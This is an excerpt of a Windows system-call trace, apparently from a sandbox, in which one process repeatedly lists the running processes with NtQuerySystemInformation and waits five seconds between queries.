0x0 [0209.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0209.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0209.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.452] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0209.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0209.462] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0209.463] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0209.463] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0209.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0209.706] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.707] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0209.711] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0209.712] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0209.713] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0209.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0209.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0209.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0209.930] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0210.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0210.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0210.014] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0210.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0210.015] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0210.244] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.245] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0210.257] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0210.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0210.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0210.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0210.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0210.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.597] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0210.707] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0210.707] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0210.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0210.710] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0210.710] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0211.509] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.512] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0211.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0211.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0211.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0211.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0211.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0211.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.845] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0211.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0211.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0211.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0211.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0211.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0212.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.303] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0212.436] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0212.436] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0212.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0212.442] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0212.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0212.731] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0212.732] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0212.756] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0212.756] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0212.757] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0212.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0212.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0213.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.310] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0213.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0213.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0213.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0213.317] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0213.318] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0213.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.478] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0213.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0213.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0213.486] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0213.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0213.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0213.709] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.711] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0213.721] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0213.721] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0213.723] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0213.724] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0213.724] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0213.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0213.985] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0213.995] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0213.995] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0214.004] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0214.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0214.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0214.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.215] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0214.220] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0214.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0214.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0214.233] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0214.233] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0214.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.497] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0214.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0214.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0214.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0214.555] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0214.556] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0214.788] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0214.792] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0214.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0214.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0214.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0214.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0214.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0215.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.001] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0215.054] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0215.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0215.056] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0215.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0215.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0215.376] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.377] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0215.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0215.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0215.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0215.383] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0215.383] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0215.553] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.554] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0215.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0215.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0215.597] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0215.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0215.599] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0215.928] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0215.929] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0215.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0215.964] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0215.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0215.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x400000, RegionSize=0xdea50*=0x20000) returned 0x0 [0215.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0x0 [0216.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0216.190] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0216.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x400000, RegionSize=0xdea64*=0x10000) returned 0x0 [0216.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x400000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x400000, ResultLength=0x0) returned 0xc0000004 [0216.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x400000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0216.237] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, 